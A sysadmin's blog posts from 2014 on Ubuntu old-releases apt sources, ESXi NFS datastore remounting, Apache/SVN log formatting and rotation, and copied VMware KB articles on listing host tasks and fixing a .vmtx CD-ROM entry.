deb http://old-releases.ubuntu.com/ubuntu/ jaunty main restricted
deb http://old-releases.ubuntu.com/ubuntu/ jaunty-updates main restricted
deb http://old-releases.ubuntu.com/ubuntu/ jaunty universe
deb http://old-releases.ubuntu.com/ubuntu/ jaunty-updates universe
deb http://old-releases.ubuntu.com/ubuntu/ jaunty multiverse
deb http://old-releases.ubuntu.com/ubuntu/ jaunty-updates multiverse
deb http://old-releases.ubuntu.com/ubuntu/ jaunty-security main restricted
deb http://old-releases.ubuntu.com/ubuntu/ jaunty-security universe
deb http://old-releases.ubuntu.com/ubuntu/ jaunty-security multiverse

Friday, August 1, 2014

manually umount and mount an nfs volume on esx 5.5

vmware esxi 5.5 says the nfs volume is not accessible. really?
 esxcli storage list  
 yep. not accessible.  
 esxcli storage nfs remove -v nfs-store  
 remove it. do whatever you do to fix the issue. then... re-add per below.  
 esxcli storage nfs add -H 192.168.6.66 -s /data/dev/nfs-store -v nfs-store  
                         ^               ^                      ^  
                         |               |                      |  
                         nfs server      |                      |  
                                         nfs export             |  
                                                            local datastore name  

Tuesday, July 29, 2014

sigh. i want to rotate this silly svn logs. i put it with the apache2 conf file, because, well, it is controlled by apache. i could totally add more in the first stanza but... the perms are off. root adm is not www-data www-data
 /var/log/apache2/*.log {  
     weekly  
     missingok  
     rotate 52  
     compress  
     delaycompress  
     notifempty  
     create 640 root adm  
     sharedscripts  
     postrotate  
         /etc/init.d/apache2 reload > /dev/null  
     endscript  
     prerotate  
         if [ -d /etc/logrotate.d/httpd-prerotate ]; then \  
             run-parts /etc/logrotate.d/httpd-prerotate; \  
         fi; \  
     endscript  
 }  
 /var/svn/logs/*.log /var/svn/logs/svn_logfile {  
     weekly  
     missingok  
     rotate 52  
     notifempty  
     create 640 www-data www-data  
     sharedscripts  
     postrotate  
         /etc/init.d/apache2 reload > /dev/null  
     endscript  
     compress  
     notifempty  
 }  

Monday, July 28, 2014

double mint gum or svn please give me something useful

and it says, i do, i do (if logs are formatted correctly).
 per: http://svnbook.red-bean.com/en/1.6/svn-book.pdf  
 <Location /svn>  
 DAV svn  
 </Location>  
 CustomLog logs/svn_logfile "%t %u %{SVN-ACTION}e" env=SVN-ACTION  
 
results in this:  
 [26/Jan/2007:22:24:20 -0600] fritz get-dir /tags r1729 props  
 that's not useful.  
 but, more useful than:  
 [26/Jan/2007:22:25:29 -0600] "PROPFIND /svn/calc/!svn/vcc/default HTTP/1.1" 207 398  
 [26/Jan/2007:22:25:29 -0600] "PROPFIND /svn/calc/!svn/bln/59 HTTP/1.1" 207 449  
 [26/Jan/2007:22:25:29 -0600] "PROPFIND /svn/calc HTTP/1.1" 207 647  
 [26/Jan/2007:22:25:29 -0600] "REPORT /svn/calc/!svn/vcc/default HTTP/1.1" 200 607  
 [26/Jan/2007:22:25:31 -0600] "OPTIONS /svn/calc HTTP/1.1" 200 188  
 [26/Jan/2007:22:25:31 -0600] "MKACTIVITY  
 /svn/calc/!svn/act/e6035ef7-5df0-4ac0-b811-4be7c823f998 HTTP/1.1" 201 227  
 gross.  
 But if we do this:  
 CustomLog logs/svn_logfile "%{%Y-%m-%d %T}t %u@%h %>s repo:%{SVN-REPOS-NAME}e %{SVN-ACTION}e (%B Bytes in %T Sec)" env=SVN-ACTION  
 we get this:  
 
[2007-Jan-26 22:22:24:20] fritz@192.168.6.6 200 repo:project get-dir /tags r1729 props (10 Bytes in 10 Sec)   
 (thanks to this: http://peternixon.net/news/2010/04/09/useful-subversion-server-logs-apache-customlog/ for the clue)  
the above only works if have your svn server set up as a Virtual host.  Otherwise, place that line right along with your other log directive.  
reload apache2 and there you go.

log rotation would be a good idea, too.

Thursday, July 24, 2014

ubuntu 10.10 apt.sources

no snappy title.  i'm tired of shifting apt.sources.  is it really needed, all these name and path changes?  oh well, it keeps us sysadmins busy, right?


/etc/apt/sources.list

deb http://old-releases.ubuntu.com/ubuntu/ maverick main restricted
deb http://old-releases.ubuntu.com/ubuntu/ maverick-updates main restricted
deb http://old-releases.ubuntu.com/ubuntu/ maverick universe
deb http://old-releases.ubuntu.com/ubuntu/ maverick-updates universe
deb http://old-releases.ubuntu.com/ubuntu/ maverick multiverse
deb http://old-releases.ubuntu.com/ubuntu/ maverick-updates multiverse
deb http://old-releases.ubuntu.com/ubuntu/ maverick-security main restricted
deb http://old-releases.ubuntu.com/ubuntu/ maverick-security universe
deb http://old-releases.ubuntu.com/ubuntu/ maverick-security multiverse
After updating your file:

sudo apt-get clean
sudo apt-get update

Friday, July 18, 2014

esx is nastay or find tasks and disks and oh my 5.5 you hate my vmtx don't you

Collecting info about tasks in ESX and ESXi

COLLECTING INFORMATION ABOUT TASKS IN VMWARE ESX AND ESXI

Symptoms

While troubleshooting issues with VMware ESX and VMware vCenter, there may be differences between what vCenter and ESX consider tasks. An issue may occur when a task within vCenter server times out, and when attempting to run other tasks, it reports the error:
Another task is already in progress.

Purpose

This article provides steps to collect information about tasks for ESX and ESXi hosts.

Resolution

Note: For more information on resolving the symptoms described above, see Restarting the Management agents on an ESX or ESXi Server (1003490).
If your problem is re-occuring, and you need to find out which task the ESX host is taking a long time to process, you can use the following steps to isolate the task.

ESX

To collect information about tasks for ESX hosts:
  1. Log into the ESX host at the console or via SSH.  For more information, seeUnable to connect to an ESX host using Secure Shell (SSH) (1003807).
  2. In order to get a list of tasks on this host, run the command:

    vmware-vim-cmd vimsvc/task_listThe output is similar to:

    (ManagedObjectReference) [
       'vim.Task:haTask-112-vim.VirtualMachine.createSnapshot-3887',   'vim.Task:haTask-pool21-vim.ResourcePool.updateConfig-33252',   'vim.Task:haTask-pool22-vim.ResourcePool.updateConfig-33253',   'vim.Task:haTask-pool3-vim.ResourcePool.updateConfig-33254',   'vim.Task:haTask-pool5-vim.ResourcePool.updateConfig-33255',   'vim.Task:haTask-pool6-vim.ResourcePool.updateConfig-33256',   'vim.Task:haTask-pool7-vim.ResourcePool.updateConfig-33257',   'vim.Task:haTask-pool8-vim.ResourcePool.updateConfig-33258',   'vim.Task:haTask-pool10-vim.ResourcePool.updateConfig-33260'
    ]
  3. To get a list of tasks associated to specific virtual machines, you must first get theVmid of the virtual machine. Run the command:

    vmware-vim-cmd vmsvc/getallvmsThe output is similar to:
    Vmid        Name                  File                       Guest OS       Version   Annotation112    VM-1           [Datastore] VM-3/VM-3.vmx      winLonghornGuest        vmx-04128    VM-2           [Datastore] VM-3/VM-3.vmx      winXPProGuest           vmx-04144    VM-3           [Datastore] VM-3/VM-3.vmx      winNetStandardGuest     vmx-04
  4. Make note of the values under the Vmid column as they will be referenced in later steps.
  5. When you have the Vmid, you can then get a list of tasks associated with a specific virtual machine. Run the command:

    vmware-vim-cmd vmsvc/get.tasklist
    where  is the number identified in step 4.

    The output is similar to:
    (ManagedObjectReference) [   'vim.Task:haTask-112-vim.VirtualMachine.createSnapshot-3887']
  6. Make note of the task identifier. In the above example, the task identifier is 3887.
  7. To get information about a particular task's status, run the command:

    vmware-vim-cmd vimsvc/task_info 

    where  is the number recorded in step 6.


    The output is similar to:
    (vmodl.fault.ManagedObjectNotFound) {   dynamicType = ,   faultCause = (vmodl.MethodFault) null,   obj = 'vim.Task:3887',   msg = "The object has already been deleted or has not been completely created",}

ESXi

To collect information about tasks for ESX hosts:
  1. Log into the ESXi host at the console. For more information, see Tech Support Mode for Emergency Support (1003677).
  2. In order to get a list of tasks on this host, run the command:

    vim-cmd vimsvc/task_listThe output is similar to

    (ManagedObjectReference) [
       'vim.Task:haTask-112-vim.VirtualMachine.createSnapshot-3887',   'vim.Task:haTask-pool21-vim.ResourcePool.updateConfig-33252',   'vim.Task:haTask-pool22-vim.ResourcePool.updateConfig-33253',   'vim.Task:haTask-pool3-vim.ResourcePool.updateConfig-33254',   'vim.Task:haTask-pool5-vim.ResourcePool.updateConfig-33255',   'vim.Task:haTask-pool6-vim.ResourcePool.updateConfig-33256',   'vim.Task:haTask-pool7-vim.ResourcePool.updateConfig-33257',   'vim.Task:haTask-pool8-vim.ResourcePool.updateConfig-33258',   'vim.Task:haTask-pool10-vim.ResourcePool.updateConfig-33260'
    ]
  3. To get a list of tasks associated to specific virtual machines, you must first get theVmid of the virtual machine. Run the command:

    vim-cmd vmsvc/getallvmsThe output is similar to:
    Vmid        Name                  File                       Guest OS       Version   Annotation112    VM-1           [Datastore] VM-3/VM-3.vmx      winLonghornGuest        vmx-04128    VM-2           [Datastore] VM-3/VM-3.vmx      winXPProGuest           vmx-04144    VM-3           [Datastore] VM-3/VM-3.vmx      winNetStandardGuest     vmx-04
  4. Make note of the values under the Vmid column as they will be referenced in later steps.
  5. When you have the Vmid, you can then get a list of tasks associated with a specific virtual machine by running the command:

    vim-cmd vmsvc/get.tasklist
    where  is the number identified in step 4.

    The output is similar to:
    (ManagedObjectReference) [   'vim.Task:haTask-112-vim.VirtualMachine.createSnapshot-3887']
  6. Make note of the task identifier. In the above example, the task identifier is 3887.
  7. To get information about a particular task's status, run the command:

    vim-cmd vimsvc/task_info 

    where  is the number recorded in step 6.


    The output is similar to:
    (vmodl.fault.ManagedObjectNotFound) {   dynamicType = ,   faultCause = (vmodl.MethodFault) null,   obj = 'vim.Task:3887',   msg = "The object has already been deleted or has not been completely created",}
...

Collecting information about tasks in VMware ESXi/ESX (1013003)


Symptoms


  • While troubleshooting issues with ESXi/ESX hosts and VMware vCenter Server, there may be differences between what vCenter Server and an ESXi/ESX host considers tasks. An issue may occur when a task within vCenter Server times out, and when attempting to run other tasks, it reports the error:
Another task is already in progress.

Purpose

This article provides steps to collect information about tasks for ESXi/ESX hosts.

Resolution

Note: For more information on resolving the symptoms described above, see Restarting the Management agents on an ESXi or ESX host (1003490). If your problem is re-occurring, and you must determine which task the ESXi/ESX host is taking a long time to process.

To isolate the task follow the steps for the appropriate host:

ESX hosts

To collect information about tasks for ESX hosts:

  1. Log into the ESX host at the console or via SSH. For more information, see Unable to connect to an ESX host using Secure Shell (SSH) (1003807).
  2. To get a list of tasks on the host, run the command:

    vmware-vim-cmd vimsvc/task_list

    The output is similar to:

    (ManagedObjectReference) [
       'vim.Task:haTask-112-vim.VirtualMachine.createSnapshot-3887',
       'vim.Task:haTask-pool21-vim.ResourcePool.updateConfig-33252',
       'vim.Task:haTask-pool22-vim.ResourcePool.updateConfig-33253',
       'vim.Task:haTask-pool3-vim.ResourcePool.updateConfig-33254',
       'vim.Task:haTask-pool5-vim.ResourcePool.updateConfig-33255',
       'vim.Task:haTask-pool6-vim.ResourcePool.updateConfig-33256',
       'vim.Task:haTask-pool7-vim.ResourcePool.updateConfig-33257',
       'vim.Task:haTask-pool8-vim.ResourcePool.updateConfig-33258',
       'vim.Task:haTask-pool10-vim.ResourcePool.updateConfig-33260'
    ]
  3. To get a list of tasks associated to specific virtual machines, you must first get the Vmid of the virtual machine. Run the command:

    vmware-vim-cmd vmsvc/getallvms

    The output is similar to:

    Vmid  Name   File                        Guest OS              Version   Annotation
    112   VM-1   [Datastore] VM-3/VM-3.vmx   winLonghornGuest      vmx-04
    128   VM-2   [Datastore] VM-3/VM-3.vmx   winXPProGuest         vmx-04
    144   VM-3   [Datastore] VM-3/VM-3.vmx   winNetStandardGuest   vmx-04
  4. Make note of the values under the Vmid column as they will be referenced in later steps.
  5. When you have the Vmid, you can then get a list of tasks associated with a specific virtual machine. Run the command:

    vmware-vim-cmd vmsvc/get.tasklist VMID

    Where VMID is the number identified in step 4.

    The output is similar to:

    (ManagedObjectReference) [
       'vim.Task:haTask-112-vim.VirtualMachine.createSnapshot-3887'
    ]
  6. Make note of the task identifier. In the example above, the task identifier is:

    haTask-112-vim.VirtualMachine.createSnapshot-3887
  7. To get information about a particular task's status, run the command:

    vmware-vim-cmd vimsvc/task_info task_identifier

    Where task_identifier is the string recorded in step 6.

    The output is similar to:

    (vim.TaskInfo) {
      dynamicType = ,
      key = "haTask-112-vim.VirtualMachine.createSnapshot-3887",
      task = 'vim.Task:haTask-112-vim.VirtualMachine.createSnapshot-3887',
      description = (vmodl.LocalizableMessage) null,
      name = "vim.VirtualMachine.createSnapshot",
      descriptionId = "VirtualMachine.createSnapshot",
      entity = 'vim.VirtualMachine:112',
      entityName = "deploy-test",
      state = "running",
      cancelled = false,
      cancelable = false,
      error = (vmodl.MethodFault) null,
      result = ,
      progress = 15,
      reason = (vim.TaskReasonUser) {
         dynamicType = ,
         userName = "root",
      },
      queueTime = "2012-11-28T01:29:35.233835Z",
      startTime = "2012-11-28T01:29:35.234891Z",
      completeTime = ,
      eventChainId = 2936866,
      changeTag = ,
      parentTaskKey = ,
      rootTaskKey = ,
    }

ESXi hosts

To collect information about tasks for ESXi hosts:

  1. Log into the ESXi host at the console. For more information, see Tech Support Mode for Emergency Support (1003677).
  2. To get a list of tasks on the host, run the command:

    vim-cmd vimsvc/task_list

    The output is similar to:

    (ManagedObjectReference) [
       'vim.Task:haTask-112-vim.VirtualMachine.createSnapshot-3887',
       'vim.Task:haTask-pool21-vim.ResourcePool.updateConfig-33252',
       'vim.Task:haTask-pool22-vim.ResourcePool.updateConfig-33253',
       'vim.Task:haTask-pool3-vim.ResourcePool.updateConfig-33254',
       'vim.Task:haTask-pool5-vim.ResourcePool.updateConfig-33255',
       'vim.Task:haTask-pool6-vim.ResourcePool.updateConfig-33256',
       'vim.Task:haTask-pool7-vim.ResourcePool.updateConfig-33257',
       'vim.Task:haTask-pool8-vim.ResourcePool.updateConfig-33258',
       'vim.Task:haTask-pool10-vim.ResourcePool.updateConfig-33260'
    ]
  3. To get a list of tasks associated to specific virtual machines, you must first get the Vmid of the virtual machine. Run the command:

    vim-cmd vmsvc/getallvms

    The output is similar to:

    Vmid  Name   File                        Guest OS              Version   Annotation
    112   VM-1   [Datastore] VM-3/VM-3.vmx   winLonghornGuest      vmx-04
    128   VM-2   [Datastore] VM-3/VM-3.vmx   winXPProGuest         vmx-04
    144   VM-3   [Datastore] VM-3/VM-3.vmx   winNetStandardGuest   vmx-04
  4. Make note of the values under the Vmid column as they will be referenced in later steps.
  5. When you have the Vmid, you can then get a list of tasks associated with a specific virtual machine by running the command:

    vim-cmd vmsvc/get.tasklist VMID

    Where VMID is the number identified in step 4.

    The output is similar to:

    (ManagedObjectReference) [
       'vim.Task:haTask-112-vim.VirtualMachine.createSnapshot-3887'
    ]
  6. Make note of the task identifier. In the example above, the task identifier is:

    haTask-112-vim.VirtualMachine.createSnapshot-3887
  7. To get information about a particular task's status, run the command:

    vim-cmd vimsvc/task_info task_identifier

    Where task_identifier is the string recorded in step 6.

    The output is similar to:

     (vim.TaskInfo) {
      dynamicType = ,
      key = "haTask-112-vim.VirtualMachine.createSnapshot-3887",
      task = 'vim.Task:haTask-112-vim.VirtualMachine.createSnapshot-3887',
      description = (vmodl.LocalizableMessage) null,
      name = "vim.VirtualMachine.createSnapshot",
      descriptionId = "VirtualMachine.createSnapshot",
      entity = 'vim.VirtualMachine:112',
      entityName = "deploy-test",
      state = "running",
      cancelled = false,
      cancelable = false,
      error = (vmodl.MethodFault) null,
      result = ,
      progress = 15,
      reason = (vim.TaskReasonUser) {
         dynamicType = ,
         userName = "root",
      },
      queueTime = "2012-11-28T01:29:35.233835Z",
      startTime = "2012-11-28T01:29:35.234891Z",
      completeTime = ,
      eventChainId = 2936866,
      changeTag = ,
      parentTaskKey = ,
      rootTaskKey = ,
    }
...

Converting a template to a virtual machine fails with the error: A component of the virtual machine is not accessible on the host (1021563)


Cause


This issue occurs when a component (for example, a virtual CD-ROM) is attached to the virtual machine but, is no longer accessible or valid.

Resolution


To work around this issue, remove the device from the virtual machine's .vmtx file.
To remove the device from the virtual machine's .vmtx file:
  1. Log in to the ESXi/ESX host service console as root from an Secure Shell (SSH) or directly from the console of the server.f
  2. Unregister the virtual machine from vCenter Server. Right-click the virtual machine and click Remove from Inventory.
  3. Go to the . vmtx file of the virtual machine by going to the Virtual Machines File System (VMFS) volume.cd /vmfs/volumes/LUN_A/virtualmachine
  4. Make a backup of the . vmtx file with the command:cp vm_name.vmtx vm_name.bak
  5. Open the . vmtx file in a text editor and look for entries similar to:ide1:0.clientDevice = "FALSE"
    ide1:0.deviceType = "cdrom-image"
    ide1:0.fileName = "/vmfs/volumes/storage1/ISO/winxp.iso"
    Note: For vSphere 5.5 substitute ide1:0.clientDevice = "FALSE" for ide1:0.present = "FALSE"
  6. Change the entries to:ide1:0.clientDevice = "TRUE"
    ide1:0.deviceType = "atapi-cdrom"
    ide1:0.fileName = "" 

    Note: For vSphere 5.5 substitute ide1:0.clientDevice = "TRUE" for ide1:0.present = "TRUE"
  7. Re-register the virtual machine. 
    To re-register a virtual machine 
    perform one of these options:
  • Re-register a virtual machine on ESX with the command:vmware-cmd –s register vm_name.vmtx
  • Re-register a virtual machine on ESXi with the command:vim-cmd solo/registervm /vmfs/volumes/datastore_name/VM_directory/VM_name.vmtx